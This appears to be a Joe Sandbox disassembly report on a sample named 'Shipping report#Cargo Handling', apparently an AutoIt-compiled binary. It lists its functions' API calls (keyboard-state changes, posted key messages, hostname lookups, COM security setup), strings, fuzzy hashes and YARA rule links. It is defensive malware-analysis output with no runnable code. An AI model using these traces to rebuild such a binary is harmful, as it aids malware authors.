Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: fecbc98962ed7f3caab99bd39a0c0573d165f0b5a374346094c4d8372b3e30c5
Instruction ID: ab0559756e406f373b14a640f9fcc0fefee9e09aad95220771bf6d80f76f7dc4
Opcode Fuzzy Hash: fecbc98962ed7f3caab99bd39a0c0573d165f0b5a374346094c4d8372b3e30c5
Instruction Fuzzy Hash: D951AD70A0020DABDB20DFA8D884BBEBBF4AF45314F148219E611DBA91E770D941DF62

Function 000FC874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 000FC913

Strings

stop, xrefs: 000FC8E4
question, xrefs: 000FC8CC
warning, xrefs: 000FC8FC
info, xrefs: 000FC8B4
blank, xrefs: 000FC895

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 82bc0b72cecd913ae8db3c30f1d7313c46784a5a2474122f160c7200c375c1e3
Instruction ID: c23033dc28c06af86ef6ee2968718989a831cd0db796a0c01446c1da16561949
Opcode Fuzzy Hash: 82bc0b72cecd913ae8db3c30f1d7313c46784a5a2474122f160c7200c375c1e3
Instruction Fuzzy Hash: 8F11F63168930FBAFB109B549D83CFE77DCDF15355B50002AFA00A6583E7E19E0562A5

Function 000FDE27 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 000FDE42
gethostname.WSOCK32(?,00000100), ref: 000FDE5C
gethostbyname.WSOCK32(?), ref: 000FDE69
inet_ntoa.WSOCK32(?), ref: 000FDEAB
_strcat.LIBCMT ref: 000FDEB9
WSACleanup.WSOCK32 ref: 000FDEDE

Strings

0.0.0.0, xrefs: 000FDE87

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 642191829-3771769585
Opcode ID: 5c3921a7d3dbcd1f0b7b0aba49e90d11c0dbc0eeeca8c4cf446f7f99be6fac9e
Instruction ID: 30c3feca3ade71922ac2cd750381d2aa4002c3bdd23b1a56a9f735856b895c90
Opcode Fuzzy Hash: 5c3921a7d3dbcd1f0b7b0aba49e90d11c0dbc0eeeca8c4cf446f7f99be6fac9e
Instruction Fuzzy Hash: D811E671904119BFCB30BB60DC4AEFF77ADDF11711F01016AF645AA492EF71DA819AA0

Function 000FED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 000FED2A
_wcslen.LIBCMT ref: 000FED3B
_wcslen.LIBCMT ref: 000FED79
_wcslen.LIBCMT ref: 000FEDAF
_wcslen.LIBCMT ref: 000FEDDF
_wcslen.LIBCMT ref: 000FEDEF
_wcslen.LIBCMT ref: 000FEE2B
_wcslen.LIBCMT ref: 000FEE5A

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: 754d4af010cebd3c2408bbcdb0da8defbd1d6f6c25e724f3bc5fb819e95feba4
Instruction ID: f3bccd93995209d147a98fc863f0c469379a8767c0814b0e445d1e687aceee21
Opcode Fuzzy Hash: 754d4af010cebd3c2408bbcdb0da8defbd1d6f6c25e724f3bc5fb819e95feba4
Instruction Fuzzy Hash: 29419E65C10258B6DB11EBF4CC8AADFB7A8AF45710F508462E618E3523FB34E355C3A6

Function 000AF8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,000E682C,00000004,00000000,00000000), ref: 000AF953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,000E682C,00000004,00000000,00000000), ref: 000EF3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,000E682C,00000004,00000000,00000000), ref: 000EF454

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 0a2b5bf861108069ff6278e3d8ce1970be66b8dfc8080e064a874242592f7649
Instruction ID: fe0e8732632110654e1a9ee282a4c16a2251338e8e2c111dfae4ecb6c56ccc40
Opcode Fuzzy Hash: 0a2b5bf861108069ff6278e3d8ce1970be66b8dfc8080e064a874242592f7649
Instruction Fuzzy Hash: 75412831608682BEC7B99BF9C88877F7BD2AF57314F14443CE187A2961C672A9C1CB51

Function 00122D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00122D1B
GetDC.USER32(00000000), ref: 00122D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00122D2E
ReleaseDC.USER32(00000000,00000000), ref: 00122D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00122D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00122D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00125A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00122DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00122DE1

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: abdccd53d620a0922783579856e29ca601230c67c91b7a4045f7b07dfa2decc5
Instruction ID: 34c0f449b15d521adfdf76192f073ec95591a0f60e3edbf521612d6ea1a68ecb
Opcode Fuzzy Hash: abdccd53d620a0922783579856e29ca601230c67c91b7a4045f7b07dfa2decc5
Instruction Fuzzy Hash: CB317A76201224BFEB218F50DC8AFEB3BA9EF09715F044055FF089A291C6759CA1CBA4

Function 000F5622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 000F5637
_memcmp.LIBVCRUNTIME ref: 000F5659
_memcmp.LIBVCRUNTIME ref: 000F5671
_memcmp.LIBVCRUNTIME ref: 000F5684
_memcmp.LIBVCRUNTIME ref: 000F569E
_memcmp.LIBVCRUNTIME ref: 000F56B1
_memcmp.LIBVCRUNTIME ref: 000F56C9
_memcmp.LIBVCRUNTIME ref: 000F56E4

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 031a79f3f239574d5926c9f1895025078078c72c5ef3d9bd55f87bcd3a7a0ed9
Instruction ID: f161010d6450f4f4482c12d113e736946a2a69ae6cae64ded31e1ca4fadcaf2c
Opcode Fuzzy Hash: 031a79f3f239574d5926c9f1895025078078c72c5ef3d9bd55f87bcd3a7a0ed9
Instruction Fuzzy Hash: FD21C871644A1D77D6545510AD92FFA33DCAF10786F840034FF15DBD82F760EE2191A5

Function 00114FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00115007
NULL Pointer assignment, xrefs: 0011502E, 00115383

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 908f4c3ed9788ee6405fdf27323e7161a3c05d6ab04a7e35a5bf8e3fbb0dfd3c
Instruction ID: 02d045346e2a65d933a1da3d2b8d8abb5aaf325ef79fa998c782bfe5ab9bd850
Opcode Fuzzy Hash: 908f4c3ed9788ee6405fdf27323e7161a3c05d6ab04a7e35a5bf8e3fbb0dfd3c
Instruction Fuzzy Hash: 55D18275A0060AEFDB18CF98D881BEEB7B6BF88344F158079E915AB281D770DD85CB50

Function 000D1522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 000D15CE
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 000D1651
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 000D16E4
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 000D16FB

Part of subcall function 000C3820: RtlAllocateHeap.NTDLL(00000000,?,00161444,?,000AFDF5,?,?,0009A976,00000010,00161440,000913FC,?,000913C6,?,00091129), ref: 000C3852

MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 000D1777
__freea.LIBCMT ref: 000D17A2
__freea.LIBCMT ref: 000D17AE

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: f3dc857c3c70127c12d7acd2fe10142ae522caa81c8b250be6ae2257ae37e133
Instruction ID: 1f3adc17bc46e11d9d428d9d06294c4c9beaef88a3b29534aabbb9a77e3e389a
Opcode Fuzzy Hash: f3dc857c3c70127c12d7acd2fe10142ae522caa81c8b250be6ae2257ae37e133
Instruction Fuzzy Hash: 6191D271E04706BADB208E64D881AEE7BF5AF49310F18465AE905E7395DF39CD40CBB0

Function 00114523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00114648
VariantInit.OLEAUT32(?), ref: 00114749
VariantClear.OLEAUT32(?), ref: 00114753
VariantClear.OLEAUT32(?), ref: 001147B0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 0011472C
Null Object assignment in FOR..IN loop, xrefs: 001145D8, 00114706, 001147BE

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 87864146f7e9de60d1c2ecde12ff7301123863b175fbdb255fc9e64390453faa
Instruction ID: c9893f4ea7150fd16aa1c4e0525b01ee706f687c0b158f9f027b41d82c2ed585
Opcode Fuzzy Hash: 87864146f7e9de60d1c2ecde12ff7301123863b175fbdb255fc9e64390453faa
Instruction Fuzzy Hash: DC919271A00215AFDF28CFA4D844FEEBBB8EF46B14F108569F515AB281D7709985CFA0

Function 00101187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0010125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00101284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 001012A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001012D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0010135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001013C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00101430

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: 03b4f17950eed1e71d225c7af19866a19ad326f554e9adc15eb7e2ae480f3269
Instruction ID: 6aeac29c212c151286c80ba21f0127c29ffd304f0e6275b6da52e3bee220268b
Opcode Fuzzy Hash: 03b4f17950eed1e71d225c7af19866a19ad326f554e9adc15eb7e2ae480f3269
Instruction Fuzzy Hash: 9F91C372A00209AFDB15DF94C884BFE77B5FF45315F214029E991EB2D1D7B8A941CB90

Function 000A948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: c08d24dbba6eb2bd1d39f64ff917bc67db4913028331a6d38b149be1a275d6e3
Instruction ID: f2bcfcb8155b9912ea9656c677e311680e06bf50610848aeb6dd00d5c215383d
Opcode Fuzzy Hash: c08d24dbba6eb2bd1d39f64ff917bc67db4913028331a6d38b149be1a275d6e3
Instruction Fuzzy Hash: D3913671E00219EFCB54CFE9C885AEEBBB9FF49320F144159E515B7251D374AA82CBA0

Function 00113947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0011396B
CharUpperBuffW.USER32(?,?), ref: 00113A7A
_wcslen.LIBCMT ref: 00113A8A
VariantClear.OLEAUT32(?), ref: 00113C1F

Part of subcall function 00100CDF: VariantInit.OLEAUT32(00000000), ref: 00100D1F
Part of subcall function 00100CDF: VariantCopy.OLEAUT32(?,?), ref: 00100D28
Part of subcall function 00100CDF: VariantClear.OLEAUT32(?), ref: 00100D34

Strings

AUTOIT.ERROR, xrefs: 00113A80, 00113A85
Incorrect Parameter format, xrefs: 001139A6, 00113BA1

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: 46176523e5e3da85bb8335cba4f1361ac6b820b6f4216e6bfd54dc7bd3a5dff8
Instruction ID: ac214ad0ff2dac22e1f5c5c1190efad7196d7a2e314faab7a59a6bd902efc668
Opcode Fuzzy Hash: 46176523e5e3da85bb8335cba4f1361ac6b820b6f4216e6bfd54dc7bd3a5dff8
Instruction Fuzzy Hash: 7E917D756083059FCB18DF24C4819AAB7E4FF89314F14882DF8999B352DB30EE45CB92

Function 00114BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 000F000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,000EFF41,80070057,?,?,?,000F035E), ref: 000F002B
Part of subcall function 000F000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,000EFF41,80070057,?,?), ref: 000F0046
Part of subcall function 000F000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,000EFF41,80070057,?,?), ref: 000F0054
Part of subcall function 000F000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,000EFF41,80070057,?), ref: 000F0064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00114C51
_wcslen.LIBCMT ref: 00114D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00114DCF
CoTaskMemFree.OLE32(?), ref: 00114DDA

Strings

NULL Pointer assignment, xrefs: 00114E23, 00114E52

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 75e9ccf565f10b66f5b76cc96e0278247953e499804d165cdc2459be7df53b22
Instruction ID: b5e0c4456a021218aefc6004b4e1da011cfd86c7c4d75ae3d4b2680637b5a8fc
Opcode Fuzzy Hash: 75e9ccf565f10b66f5b76cc96e0278247953e499804d165cdc2459be7df53b22
Instruction Fuzzy Hash: AA913871D0021DAFDF14DFA4D891EEEB7B9BF08710F108169E915A7252EB349A85CFA0

Function 001220FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00122183
GetMenuItemCount.USER32(00000000), ref: 001221B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 001221DD
_wcslen.LIBCMT ref: 00122213
GetMenuItemID.USER32(?,?), ref: 0012224D
GetSubMenu.USER32(?,?), ref: 0012225B

Part of subcall function 000F3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 000F3A57
Part of subcall function 000F3A3D: GetCurrentThreadId.KERNEL32 ref: 000F3A5E
Part of subcall function 000F3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,000F25B3), ref: 000F3A65

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 001222E3

Part of subcall function 000FE97B: Sleep.KERNEL32 ref: 000FE9F3

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: c922146733a6403e209fd4937342267feca76ddd5834d2661f75e2b9b549f8ef
Instruction ID: b18b4bd742690d447b5c6bc234cf166e282c65ed0398d4ec1f7841b1063c4111
Opcode Fuzzy Hash: c922146733a6403e209fd4937342267feca76ddd5834d2661f75e2b9b549f8ef
Instruction Fuzzy Hash: 8871AE35E00215EFCB14DFA4D841AAEB7F1EF48310F118468E916EB352DB35EE528B90

Function 000FAEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 000FAEF9
GetKeyboardState.USER32(?), ref: 000FAF0E
SetKeyboardState.USER32(?), ref: 000FAF6F
PostMessageW.USER32(?,00000101,00000010,?), ref: 000FAF9D
PostMessageW.USER32(?,00000101,00000011,?), ref: 000FAFBC
PostMessageW.USER32(?,00000101,00000012,?), ref: 000FAFFD
PostMessageW.USER32(?,00000101,0000005B,?), ref: 000FB020

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: f1a84329c2d91e090ad4c8cb4e3ee232423618363391f293ae014c7da9fb8559
Instruction ID: f4a10d7d75e3464fe86b47d02c3f47f41381846aaf04d96a7bdce9771cbffb86
Opcode Fuzzy Hash: f1a84329c2d91e090ad4c8cb4e3ee232423618363391f293ae014c7da9fb8559
Instruction Fuzzy Hash: 6A51C2E06047D93DFB768274CC45BBA7EE96B06304F088599E3D949CC3C798A8D8EB51

Function 000FACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 000FAD19
GetKeyboardState.USER32(?), ref: 000FAD2E
SetKeyboardState.USER32(?), ref: 000FAD8F
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 000FADBB
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 000FADD8
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 000FAE17
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 000FAE38

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
